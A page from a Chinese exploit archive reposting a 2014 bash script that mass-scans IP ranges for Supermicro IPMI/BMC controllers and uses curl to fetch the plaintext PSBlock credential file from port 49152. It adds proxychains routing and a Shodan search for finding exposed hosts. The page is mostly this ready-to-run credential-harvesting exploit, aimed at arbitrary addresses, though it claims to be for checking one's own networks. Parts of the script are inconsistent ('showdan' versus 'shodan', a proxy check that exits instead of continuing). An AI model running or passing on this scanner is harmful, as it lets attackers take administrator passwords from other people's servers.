首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Supermicro IPMI/BMC Cleartext Password Scanner
来源:treadstonesecurity.blogspot.ca 作者:1N3 发布时间:2014-06-24   
#!/bin/bash
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
#
# ABOUT:
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to 
# request the file PSBlock via port 49152. This plain text password file contains IPMI 
# username and password information. This script allows users to scan their networks
# check for vulnerable systems that require patching. 
#
# USAGE: 
# ./supermicro_scan.sh 74.200.8.237 - Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy
# ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ
#

clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"
echo ""

UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
PROXY=$2

if [ "$UNICORNSCAN" == "" ]; then
	echo "(--==== Unicornscan not installed! Exiting..."
	exit
fi

if [ "$PROXYCHAINS" == "" ]; then
	echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
	exit
fi

if [ "$CURL" == "" ]; then
	echo "(--==== Curl not installed! Exiting..."
	exit
fi

if [ -z "$1" ]; then
	echo "(--==== Usage: ___FCKpd___0 <CIDR|IP> [proxy]"
	exit
fi

if [ $TARGET == "shodan" ]; then
# SCAN USING SHODANHQ SEARCH
	echo "Searching ShowdanHQ..."
	iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
	exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
	echo "(--==== Scanning via proxy..."
	# SCAN FOR THE DEFAULT FILES AND PORTS
	for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do 
		echo "(--==== Extracting User/Pass from $a"
		echo "(--==== Sending GET http://$a:49152/PSBlock"
		proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
	done
	exit

else 
# NO PROXY
	echo "(--==== Scanning via direct connection..."
	# SCAN FOR THE DEFAULT FILES AND PORTS
	for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do 
		echo "(--==== Extracting User/Pass from $a"
		echo "(--==== Sending GET http://$a:49152/PSBlock"
		curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
	done
	exit

fi

echo ""
echo "(--==== Scan Complete!"
exit

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Lunar CMS 3.3 Unauthenticated
·D-Link hedwig.cgi Buffer Overf
·Linux Kernel <= 3.13 - Local P
·D-Link authentication.cgi Buff
·D-link DSL-2760U-E1 - Persiste
·Cogent DataHub Command Injecti
·AlienVault OSSIM av-centerd Co
·AlienVault OSSIM < 4.7.0 - av-
·Ericom AccessNow Server Buffer
·Internet Explorer 8, 9 & 10 -
·docker 0.11 VMM-container Brea
·Python CGIHTTPServer File Disc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved